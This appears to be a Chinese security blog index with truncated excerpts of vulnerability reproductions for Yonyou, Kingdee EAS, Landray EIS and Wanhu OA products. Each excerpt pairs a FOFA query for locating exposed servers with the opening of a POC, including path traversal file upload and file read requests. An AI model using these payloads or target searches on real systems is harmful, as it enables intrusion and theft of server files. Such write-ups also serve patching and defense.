摘要:
漏洞简介 用友移动管理系统upload任意文件上传漏洞。 漏洞复现 fofa语法:app="用友-移动系统管理" 登录页面如下: POC: POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1 Host: 阅读全文
摘要:
漏洞简介 用友移动管理系统的download接口存在任意文件读取漏洞,攻击者可以利用该漏洞读取服务器上的敏感文件。 漏洞复现 fofa语法:app="用友-移动系统管理" 登录页面如下: POC:/mobsm/common/download?path=\..\webapps\nc_web\WEB-I 阅读全文
摘要:
漏洞简介 金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶EAS及EAS cloud存在任意文件上传漏洞 影响版本 金蝶 EAS 8.0,8.1,8.2,8.5 金蝶 EAS Cloud 8.6私有云,8.6公有云,8. 阅读全文
摘要:
漏洞简介 蓝凌 EIS智慧协同平台saveImg存在任意文件上传漏洞 漏洞复现 fofa语法:body="欢迎登录智慧协同平台" 登录页面如下: POC: POST /eis/service/api.aspx?action=saveImg HTTP/1.1 Host: User-Agent: Moz 阅读全文
摘要:
漏洞简介 万户OA存在SendFileCheckTemplateEdit-SQL注入,该漏洞为前台漏洞 漏洞复现 fofa语法:app="万户ezOFFICE协同管理平台" 登录页面如下: POC:/defaultroot/public/iWebOfficeSign/Template/SendFil 阅读全文
摘要:
漏洞简介 用友NC的download文件存在任意文件读取漏洞,攻击者可以利用该漏洞读取服务器上的敏感文件。 漏洞复现 fofa语法:app="用友-UFIDA-NC" POC: /portal/pt/xml/file/download?pageId=login&filename=..%5Cindex 阅读全文